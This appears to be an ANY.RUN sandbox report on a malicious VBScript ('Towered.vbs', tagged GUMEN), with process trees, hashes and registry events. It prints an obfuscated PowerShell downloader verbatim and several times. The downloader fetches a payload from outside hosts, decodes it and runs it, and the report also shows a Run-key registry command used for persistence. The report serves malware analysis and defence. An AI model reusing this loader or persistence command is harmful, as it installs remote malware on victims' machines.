File name:

Towered.vbs

Full analysis: https://app.any.run/tasks/89075749-69e1-44fa-b697-143c9f376b58
Verdict: Malicious activity
Analysis date: November 20, 2024, 07:07:04
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
gumen
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

4BDC3A0F5DE043DC8B4D66E074ECB39D

SHA1:

46112E4C9B252673E65DA63D5D986B238DE8601F

SHA256:

B7EB907DA15FA184A1B81730F41B3DFC46A91D24A92AA4C132A6204421A910F7

SSDEEP:

768:f9xg8xZSki9VAulLUbUcO7VNoptqYhAtf0C3MEdTd4OFv:T3SxlJjopPyka

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • GUMEN has been detected

      • powershell.exe (PID: 3608)
      • powershell.exe (PID: 6032)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5696)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 5696)

    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 5752)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2292)

  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 5696)

    • Manual execution by a user

      • powershell.exe (PID: 3608)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 5696)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs #GUMEN powershell.exe conhost.exe no specs svchost.exe #GUMEN powershell.exe no specs conhost.exe no specs msiexec.exe cmd.exe no specs conhost.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2292"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Assheadedness% -windowstyle 1 $Brneteaters=(gp -Path 'HKCU:\Software\Appendicial\').Regnskabschefens;%Assheadedness% ($Brneteaters)"C:\Windows\SysWOW64\cmd.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3608"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Ennobles Systemadministratorernes oocyesis Vellysten Undiminutive #><#Sektion Cykelsports Audienssalens Shoggly Hjkommisrer Tarcel #>$Underlets='Featureugen';function Klippesten($Slibrige){If ($host.DebuggerEnabled) {$Schucht=5} for ($Witherdeed=$Schucht;;$Witherdeed+=6){if(!$Slibrige[$Witherdeed]) { break }$Snakken+=$Slibrige[$Witherdeed]}$Snakken}function afsave($Kalderne){ .($Sociolegal) ($Kalderne)}$Besejler=Klippesten 'brofaN HauteUnemeTMelle.Af,alwtestieSmuglbToko.c S.gelMel pi npereM gsbnFjernT';$Thesauris=Klippesten 'OvuleMEnemaoUanbrzFro tiEmp rlCard lPat ia Engr/';$supersubtle=Klippesten 'Ka.trTdiffelHatchsStump1Aphic2';$Kastepils='Montg[MandrNHundrEBen.et Gryd.A.topsSch.megounarsibylvParkeIDiffeCBindsELimosPVovhuoPerspi pa,iNMe,iltGastrmFemeuA Overnveuvea ThisgVarmeeNedrurKirur],oinc:Acced:KvadrsInterEIn.enc Res U Un,frKlynki ForbTGrundyH nnipUndelr In,eOkapactKonsuoAfsniCSwi.goSansal.vorn=Forur$AccomSM sopUfulliPP,laeE idaxrJarn SSeignuunde BFrivotf jlpL ,eteE';$Thesauris+=Klippesten ' Blad5Myc t.Bogb.0 Feif B.udu( UspnWFor liuneffnli.usdUnsatoDisulwS inasParan At,iuN uffeTCrina domin1Oospo0Lavpa. Subs0Blyan;Svenn Hy.eWCleariExternForsk6Rable4P aka;Paner I,lusxChemo6Skill4Bundr;Sj.es Tryklr UnanvUnder:Uncog1Dagdr3 Mate1Is an.bolig0A.ylo)Buffe S.rvGFrasteVicuscSavi kB.sttoDistr/Tyd i2 Alts0Fyrin1Ballh0hesth0 Kle 1Santo0Infel1bista AmoroFMode iRhizor evomeRes.mfAttraoGarnix Lret/Man,a1Speci3Athyr1Ene r. Va,l0';$Snufflingly=Klippesten 'nonimUM galSRat.beBrandRLegen-Tumblasali gUdtapEso guNF milT';$Flgevirkningen=Klippesten 'AfmilhKl.sttRovdyttermip EophsFartg:Nucle/stnkp/EftersWasheh DeviaTilbalUnconoTilbjuGramoxBlasftAlban.SnusftSbesroSk lepDrill/ SlarUDrumfnRealedFodg,e s blr DriksFi teh DissoFarimozi.cot platiMedicnFiligg Op r. RetrhRedethUdgank Farv> BranhUriditFriaktscoinp bo tsScorc: Marm/Ru bl/Spleuo airllD,garaSuccemLit.ol cau.t .ortdSky.e. FirstLe tioTrykkpcirku/D,lfiUH melnEquildStedmeNo derTi,nrs Frsth.enteobivouoSovjet dlerijournnFluorgKlger.DavenhCaus h Dib k';$Skurebrste=Klippesten 'Nonad>';$Sociolegal=Klippesten 'Inkari ondoeSammeX';$Lithically='Antimilitaristers';$Sciosophist='\Harmonicas.Pre';afsave (Klippesten 'Skide$ AfhoGNearcLAubrioB dgrBH.vedAS.eurl sush: ssaoK Pat O,jtrynGe,thFSoldeEKdetcREnk lCBuegaEHyperr Sama=Finge$ Lyc eOve.dn InclV Hnge:Sha pAF,mlepCopr pRenseDExa cAJuve TA chdaLob.l+Ditzi$SkattsSebbeCseqfciEncefOApicaSStrkmo ExtePAutarhAtro iUndlasEpokeT');afsave (Klippesten 'Opadb$To,meGSamselDeiceOKnoglbL boraBi grLIltfa:MalteACartsr Va rMPulveERib erPythoE aalDBenn eTag.t=Flj s$Kl ptfBegreLSu jeGHeralELrerivDomstIDisquRnoncokCa amNCoralI InvaNlamstgEcc oEUnwelNFodba.Asf,lsDildsP FastlYndl iAfpattHuser( Barm$ lageSBegunk DiplUCommir CoffeImushBm binrForbrsmodentSabbaePostu)');afsave (Klippesten $Kastepils);$Flgevirkningen=$Armerede[0];$Hyperstoical=(Klippesten 'Emm r$ ypecgBef,lLXer.pOAfghabSilu.aUnderlSynta:Sae,gbKabelR A fiARangsnCetacdPja ksOscartUnderAM llet ,eriI InveoLedi.NallineGouterT ingStranl= r guN Le.se,okkeWminds- PlayO Unc bCrassj.nsekETrom cAd ostSpydk B oknS PerpYR,vigSScragt Apose SovsMLetha.Urte,$Svansb GlosEP.earSLas aEMedicjCarryLUn,ere orneR');afsave ($Hyperstoical);afsave (Klippesten 'Trail$Detr B Ilpar OptaaTarmrnRegn,dRe.orsContrt .angaTilsytTran.iI,genoBesnrnVarekeUnprorAc uisTvrfa.BobleHYaponeStandaAntipd ForseRenrirColossC rtw[Budge$Sk.kkSInbitnreequu,ychefAn,elf.dhnglOrgieiDise,nSi,ulg F uslDyr myIndsk]Sparr= Back$PredeT Saldh SeroeSawbusFi.saaA,toeuBallerCassoi Hjers');$Euros=Klippesten 'Syn h$Thor,BMis.brDaaseaDexionbattedHo,chsLgnagtKon oaBagrut Un aiOplb oN vnknf.ldkeRuacurSt kos Dr v.BilleDInfido Cer wBi ian Raasl K,afoLinolaFiletd b keFVar.aiTithelParele Sa,b(Hyper$ oregFKokkel Ejb gSpideeNonupvBatisi Dv irReviskB,tjen Behnimagnin inclgSnoreeBega n Trol, arqu$Ra kfPHawsee SavvrAkt rf Skrio PagtrH vedaDi trtkiasbiAlgernUndevg and1Servi7Audio5Mokka)';$Perforating175=$Konfercer;afsave (Klippesten 'Whi,t$ P.ojgSnderlTwierOnonreB SyltAAfbenlTinam:MumneG Bnder Um eaUnde PHengiHBon oi ilmgc Bags= Niss(SpermTG.apiE Udl SsupplTUmenn- I dkPVolu,AVisitTPropohCifre Sight$WafflPDkkete BvreRHarrofhjemmo DonerBihulaEt erTDow sI talnAlterg Hous1 Dunj7 Arct5 onol)');while (!$Graphic) {afsave (Klippesten 'tric $StendgAarp.lCommaoProexbAnkeraJu kelvgter:ChresSVakuup ildeoPositrTinekv S.uloMechigFidlenRegiosWicopkRebouo Obstn usindModk,urea,mkintert G llr.erroeDagklnmatth=K dmi$Unre,S S amt Ph.eyFilatr Slagt VermeMega.gVagraoMottodTheats') ;afsave $Euros;afsave (Klippesten 'NonmesWilleTStovtA TortrRunolTTroug-FlyveSMerchLRandieHemateBarriP ers ewwo4');afsave (Klippesten 'Unsad$IntragRelstLNoncoOInfe BRe onaR gnbLByssu: Teksg allRmodelAskrotp ForsHEllysiStramcRevan=Temat( DrenTWaybiEHofmasNeph tDolke-Forl P Bipla Po zTBekomH jer Teleo$OyvinPJernbeafhopRAfs af PersoStrykrBri tAPanf TAlkylIBasopNVelatgFor.r1Neuro7Autos5Ancie)') ;afsave (Klippesten 'B,nem$kodesGUnderlart foOutecbLftpiASenenlStrmp:ToskiI ove n,ropugLizetEPhycoNEpi.rILigniR Sys,a FlygkP,eliAGlittD St.neOver M S ifiMaane=Recou$NedbrG Id oL SgeoO angB inieA sjleLDesig:Unc.rbPjatglDismiK MandK Fny eBegletConco+ prec+N,zit%Aviar$Pa,soaHaemoR yroMcy loEAristr EfteEAnte.dUds reGrund.UnnoocSolvooSophiuSkyndn menaT') ;$Flgevirkningen=$Armerede[$Ingenirakademi]}$Generindringsvelser=283334;$ekvilibrismen=32997;afsave (Klippesten 'M stn$ElvilGLibrilSjas oHammeBUn ubABrazilpr.ve:P attu ne,kdExplosOri lUUni.sgK rrenA delIAtoleNSubarGV jle Sgem=Tatou Mor,eGtubemeRidebtRati -FuldbcShopbOIsox n FirdTLynghEInstrnFnatmtBrne Hon,s$RegnepSt liEYe leRBumleF BiwioK,tchrLithaaFo krTGo.ssIA derN HurrgHyper1Nonro7rippl5');afsave (Klippesten 'Debr.$unpalgCo,pul Twiso K.llbHjteka PomplDrank:OrdurFTrff,o C,rrx Fulmg paavlDynamoForgavFoupoeNestlsTummi Gra h= rady Oxhi[ Un.aSNoneqySdvansCathot Hypoeblue,m Sl.t. ortCRambloAd.annEksigv .nkmeFor erGangltMacre] M.th:seedi:Uimo F .orur SkatoFor,tmBygbaB ilanaSquinsVaporeHaste6Forbe4LdervSQuin tBa.otrKoblei Mot nbitangKl rg(Nasal$GammaU nindKvasssgle nuStricgRkedanMollui Neo.n.laggg Entr)');afsave (Klippesten 'Fusio$AngreGOkkullNonalO m teBErgosaLiggelUnsen:Tama.hFremkECe trX SinnAArbejn red.G,tandu onomLComprAPengerkokst Gedes= Atte Krypt[M rblsLudlaypulstSLasertBoj.teBryd M S sa.Go siTDekupeJa,atX EdsfTStvko.PodsoeCykelNKa khc ForsO DisrdUnfisI ,revNRatteGletva]blati: Okku:P dotALi rdS Pa sc meriISttediScrim.Nedstg ZoomeAdrttT amsts Po nT reicRIntelIPrestNSightgColor(Domin$MaskiFOvernOI ebeX Jarbg enal InseOchontvBarkpeSinl,sWitho)');afsave (Klippesten 'Enren$LngodGOpv,rLS orsO Qu rb D,ciaUnconL Kont:PaniceBetracShagbhTrombOO arbWHibbeI Hur s MisieNevad=filmb$ ThiohUindbeChaldxBaandAFlowenH ndlGHai wUTeeuplTyndsAR marrOutdr.OverpsAnacluGeoloBOm,gnSExcoet.jergRAnnelIK ppenT vejGC unt( Warw$ TittG MartEFrihoNBorgee Ha,rROpseniD.conNTrugmdTeater,tueuIKethiN HyldgPrintsFigwoV,reckelignolNohowSShre ETheo,rDusto,Krite$Mi,roE LkkeKCrossvMilliIn,nliloplriiSinusb FornR FrasiHerp SKrateMStoplEBan nNTystn)');afsave $Echowise;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4348\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5444REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Assheadedness% -windowstyle 1 $Brneteaters=(gp -Path 'HKCU:\Software\Appendicial\').Regnskabschefens;%Assheadedness% ($Brneteaters)"C:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
5496\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5696"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\Desktop\Towered.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5752"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
5832\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6032"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ennobles Systemadministratorernes oocyesis Vellysten Undiminutive #><#Sektion Cykelsports Audienssalens Shoggly Hjkommisrer Tarcel #>$Underlets='Featureugen';function Klippesten($Slibrige){If ($host.DebuggerEnabled) {$Schucht=5} for ($Witherdeed=$Schucht;;$Witherdeed+=6){if(!$Slibrige[$Witherdeed]) { break }$Snakken+=$Slibrige[$Witherdeed]}$Snakken}function afsave($Kalderne){ .($Sociolegal) ($Kalderne)}$Besejler=Klippesten 'brofaN HauteUnemeTMelle.Af,alwtestieSmuglbToko.c S.gelMel pi npereM gsbnFjernT';$Thesauris=Klippesten 'OvuleMEnemaoUanbrzFro tiEmp rlCard lPat ia Engr/';$supersubtle=Klippesten 'Ka.trTdiffelHatchsStump1Aphic2';$Kastepils='Montg[MandrNHundrEBen.et Gryd.A.topsSch.megounarsibylvParkeIDiffeCBindsELimosPVovhuoPerspi pa,iNMe,iltGastrmFemeuA Overnveuvea ThisgVarmeeNedrurKirur],oinc:Acced:KvadrsInterEIn.enc Res U Un,frKlynki ForbTGrundyH nnipUndelr In,eOkapactKonsuoAfsniCSwi.goSansal.vorn=Forur$AccomSM sopUfulliPP,laeE idaxrJarn SSeignuunde BFrivotf jlpL ,eteE';$Thesauris+=Klippesten ' Blad5Myc t.Bogb.0 Feif B.udu( UspnWFor liuneffnli.usdUnsatoDisulwS inasParan At,iuN uffeTCrina domin1Oospo0Lavpa. Subs0Blyan;Svenn Hy.eWCleariExternForsk6Rable4P aka;Paner I,lusxChemo6Skill4Bundr;Sj.es Tryklr UnanvUnder:Uncog1Dagdr3 Mate1Is an.bolig0A.ylo)Buffe S.rvGFrasteVicuscSavi kB.sttoDistr/Tyd i2 Alts0Fyrin1Ballh0hesth0 Kle 1Santo0Infel1bista AmoroFMode iRhizor evomeRes.mfAttraoGarnix Lret/Man,a1Speci3Athyr1Ene r. Va,l0';$Snufflingly=Klippesten 'nonimUM galSRat.beBrandRLegen-Tumblasali gUdtapEso guNF milT';$Flgevirkningen=Klippesten 'AfmilhKl.sttRovdyttermip EophsFartg:Nucle/stnkp/EftersWasheh DeviaTilbalUnconoTilbjuGramoxBlasftAlban.SnusftSbesroSk lepDrill/ SlarUDrumfnRealedFodg,e s blr DriksFi teh DissoFarimozi.cot platiMedicnFiligg Op r. RetrhRedethUdgank Farv> BranhUriditFriaktscoinp bo tsScorc: Marm/Ru bl/Spleuo airllD,garaSuccemLit.ol cau.t .ortdSky.e. FirstLe tioTrykkpcirku/D,lfiUH melnEquildStedmeNo derTi,nrs Frsth.enteobivouoSovjet dlerijournnFluorgKlger.DavenhCaus h Dib k';$Skurebrste=Klippesten 'Nonad>';$Sociolegal=Klippesten 'Inkari ondoeSammeX';$Lithically='Antimilitaristers';$Sciosophist='\Harmonicas.Pre';afsave (Klippesten 'Skide$ AfhoGNearcLAubrioB dgrBH.vedAS.eurl sush: ssaoK Pat O,jtrynGe,thFSoldeEKdetcREnk lCBuegaEHyperr Sama=Finge$ Lyc eOve.dn InclV Hnge:Sha pAF,mlepCopr pRenseDExa cAJuve TA chdaLob.l+Ditzi$SkattsSebbeCseqfciEncefOApicaSStrkmo ExtePAutarhAtro iUndlasEpokeT');afsave (Klippesten 'Opadb$To,meGSamselDeiceOKnoglbL boraBi grLIltfa:MalteACartsr Va rMPulveERib erPythoE aalDBenn eTag.t=Flj s$Kl ptfBegreLSu jeGHeralELrerivDomstIDisquRnoncokCa amNCoralI InvaNlamstgEcc oEUnwelNFodba.Asf,lsDildsP FastlYndl iAfpattHuser( Barm$ lageSBegunk DiplUCommir CoffeImushBm binrForbrsmodentSabbaePostu)');afsave (Klippesten $Kastepils);$Flgevirkningen=$Armerede[0];$Hyperstoical=(Klippesten 'Emm r$ ypecgBef,lLXer.pOAfghabSilu.aUnderlSynta:Sae,gbKabelR A fiARangsnCetacdPja ksOscartUnderAM llet ,eriI InveoLedi.NallineGouterT ingStranl= r guN Le.se,okkeWminds- PlayO Unc bCrassj.nsekETrom cAd ostSpydk B oknS PerpYR,vigSScragt Apose SovsMLetha.Urte,$Svansb GlosEP.earSLas aEMedicjCarryLUn,ere orneR');afsave ($Hyperstoical);afsave (Klippesten 'Trail$Detr B Ilpar OptaaTarmrnRegn,dRe.orsContrt .angaTilsytTran.iI,genoBesnrnVarekeUnprorAc uisTvrfa.BobleHYaponeStandaAntipd ForseRenrirColossC rtw[Budge$Sk.kkSInbitnreequu,ychefAn,elf.dhnglOrgieiDise,nSi,ulg F uslDyr myIndsk]Sparr= Back$PredeT Saldh SeroeSawbusFi.saaA,toeuBallerCassoi Hjers');$Euros=Klippesten 'Syn h$Thor,BMis.brDaaseaDexionbattedHo,chsLgnagtKon oaBagrut Un aiOplb oN vnknf.ldkeRuacurSt kos Dr v.BilleDInfido Cer wBi ian Raasl K,afoLinolaFiletd b keFVar.aiTithelParele Sa,b(Hyper$ oregFKokkel Ejb gSpideeNonupvBatisi Dv irReviskB,tjen Behnimagnin inclgSnoreeBega n Trol, arqu$Ra kfPHawsee SavvrAkt rf Skrio PagtrH vedaDi trtkiasbiAlgernUndevg and1Servi7Audio5Mokka)';$Perforating175=$Konfercer;afsave (Klippesten 'Whi,t$ P.ojgSnderlTwierOnonreB SyltAAfbenlTinam:MumneG Bnder Um eaUnde PHengiHBon oi ilmgc Bags= Niss(SpermTG.apiE Udl SsupplTUmenn- I dkPVolu,AVisitTPropohCifre Sight$WafflPDkkete BvreRHarrofhjemmo DonerBihulaEt erTDow sI talnAlterg Hous1 Dunj7 Arct5 onol)');while (!$Graphic) {afsave (Klippesten 'tric $StendgAarp.lCommaoProexbAnkeraJu kelvgter:ChresSVakuup ildeoPositrTinekv S.uloMechigFidlenRegiosWicopkRebouo Obstn usindModk,urea,mkintert G llr.erroeDagklnmatth=K dmi$Unre,S S amt Ph.eyFilatr Slagt VermeMega.gVagraoMottodTheats') ;afsave $Euros;afsave (Klippesten 'NonmesWilleTStovtA TortrRunolTTroug-FlyveSMerchLRandieHemateBarriP ers ewwo4');afsave (Klippesten 'Unsad$IntragRelstLNoncoOInfe BRe onaR gnbLByssu: Teksg allRmodelAskrotp ForsHEllysiStramcRevan=Temat( DrenTWaybiEHofmasNeph tDolke-Forl P Bipla Po zTBekomH jer Teleo$OyvinPJernbeafhopRAfs af PersoStrykrBri tAPanf TAlkylIBasopNVelatgFor.r1Neuro7Autos5Ancie)') ;afsave (Klippesten 'B,nem$kodesGUnderlart foOutecbLftpiASenenlStrmp:ToskiI ove n,ropugLizetEPhycoNEpi.rILigniR Sys,a FlygkP,eliAGlittD St.neOver M S ifiMaane=Recou$NedbrG Id oL SgeoO angB inieA sjleLDesig:Unc.rbPjatglDismiK MandK Fny eBegletConco+ prec+N,zit%Aviar$Pa,soaHaemoR yroMcy loEAristr EfteEAnte.dUds reGrund.UnnoocSolvooSophiuSkyndn menaT') ;$Flgevirkningen=$Armerede[$Ingenirakademi]}$Generindringsvelser=283334;$ekvilibrismen=32997;afsave (Klippesten 'M stn$ElvilGLibrilSjas oHammeBUn ubABrazilpr.ve:P attu ne,kdExplosOri lUUni.sgK rrenA delIAtoleNSubarGV jle Sgem=Tatou Mor,eGtubemeRidebtRati -FuldbcShopbOIsox n FirdTLynghEInstrnFnatmtBrne Hon,s$RegnepSt liEYe leRBumleF BiwioK,tchrLithaaFo krTGo.ssIA derN HurrgHyper1Nonro7rippl5');afsave (Klippesten 'Debr.$unpalgCo,pul Twiso K.llbHjteka PomplDrank:OrdurFTrff,o C,rrx Fulmg paavlDynamoForgavFoupoeNestlsTummi Gra h= rady Oxhi[ Un.aSNoneqySdvansCathot Hypoeblue,m Sl.t. ortCRambloAd.annEksigv .nkmeFor erGangltMacre] M.th:seedi:Uimo F .orur SkatoFor,tmBygbaB ilanaSquinsVaporeHaste6Forbe4LdervSQuin tBa.otrKoblei Mot nbitangKl rg(Nasal$GammaU nindKvasssgle nuStricgRkedanMollui Neo.n.laggg Entr)');afsave (Klippesten 'Fusio$AngreGOkkullNonalO m teBErgosaLiggelUnsen:Tama.hFremkECe trX SinnAArbejn red.G,tandu onomLComprAPengerkokst Gedes= Atte Krypt[M rblsLudlaypulstSLasertBoj.teBryd M S sa.Go siTDekupeJa,atX EdsfTStvko.PodsoeCykelNKa khc ForsO DisrdUnfisI ,revNRatteGletva]blati: Okku:P dotALi rdS Pa sc meriISttediScrim.Nedstg ZoomeAdrttT amsts Po nT reicRIntelIPrestNSightgColor(Domin$MaskiFOvernOI ebeX Jarbg enal InseOchontvBarkpeSinl,sWitho)');afsave (Klippesten 'Enren$LngodGOpv,rLS orsO Qu rb D,ciaUnconL Kont:PaniceBetracShagbhTrombOO arbWHibbeI Hur s MisieNevad=filmb$ ThiohUindbeChaldxBaandAFlowenH ndlGHai wUTeeuplTyndsAR marrOutdr.OverpsAnacluGeoloBOm,gnSExcoet.jergRAnnelIK ppenT vejGC unt( Warw$ TittG MartEFrihoNBorgee Ha,rROpseniD.conNTrugmdTeater,tueuIKethiN HyldgPrintsFigwoV,reckelignolNohowSShre ETheo,rDusto,Krite$Mi,roE LkkeKCrossvMilliIn,nliloplriiSinusb FornR FrasiHerp SKrateMStoplEBan nNTystn)');afsave $Echowise;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 250
Read events
14 247
Write events
3
Delete events
0

Modification events

(PID) Process:(5752) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Appendicial
Operation:writeName:Regnskabschefens
Value:
<#Ennobles Systemadministratorernes oocyesis Vellysten Undiminutive #><#Sektion Cykelsports Audienssalens Shoggly Hjkommisrer Tarcel #>$Underlets='Featureugen';function Klippesten($Slibrige){If ($host.DebuggerEnabled) {$Schucht=5} for ($Witherdeed=$Schucht;;$Witherdeed+=6){if(!$Slibrige[$Witherdeed]) { break }$Snakken+=$Slibrige[$Witherdeed]}$Snakken}function afsave($Kalderne){ .($Sociolegal) ($Kalderne)}$Besejler=Klippesten 'brofaN HauteUnemeTMelle.Af,alwtestieSmuglbToko.c S.gelMel pi npereM gsbnFjernT';$Thesauris=Klippesten 'OvuleMEnemaoUanbrzFro tiEmp rlCard lPat ia Engr/';$supersubtle=Klippesten 'Ka.trTdiffelHatchsStump1Aphic2';$Kastepils='Montg[MandrNHundrEBen.et Gryd.A.topsSch.megounarsibylvParkeIDiffeCBindsELimosPVovhuoPerspi pa,iNMe,iltGastrmFemeuA Overnveuvea ThisgVarmeeNedrurKirur],oinc:Acced:KvadrsInterEIn.enc Res U Un,frKlynki ForbTGrundyH nnipUndelr In,eOkapactKonsuoAfsniCSwi.goSansal.vorn=Forur$AccomSM sopUfulliPP,laeE idaxrJarn SSeignuunde BFrivotf jlpL ,eteE';$Thesauris+=Klippesten ' Blad5Myc t.Bogb.0 Feif B.udu( UspnWFor liuneffnli.usdUnsatoDisulwS inasParan At,iuN uffeTCrina domin1Oospo0Lavpa. Subs0Blyan;Svenn Hy.eWCleariExternForsk6Rable4P aka;Paner I,lusxChemo6Skill4Bundr;Sj.es Tryklr UnanvUnder:Uncog1Dagdr3 Mate1Is an.bolig0A.ylo)Buffe S.rvGFrasteVicuscSavi kB.sttoDistr/Tyd i2 Alts0Fyrin1Ballh0hesth0 Kle 1Santo0Infel1bista AmoroFMode iRhizor evomeRes.mfAttraoGarnix Lret/Man,a1Speci3Athyr1Ene r. Va,l0';$Snufflingly=Klippesten 'nonimUM galSRat.beBrandRLegen-Tumblasali gUdtapEso guNF milT';$Flgevirkningen=Klippesten 'AfmilhKl.sttRovdyttermip EophsFartg:Nucle/stnkp/EftersWasheh 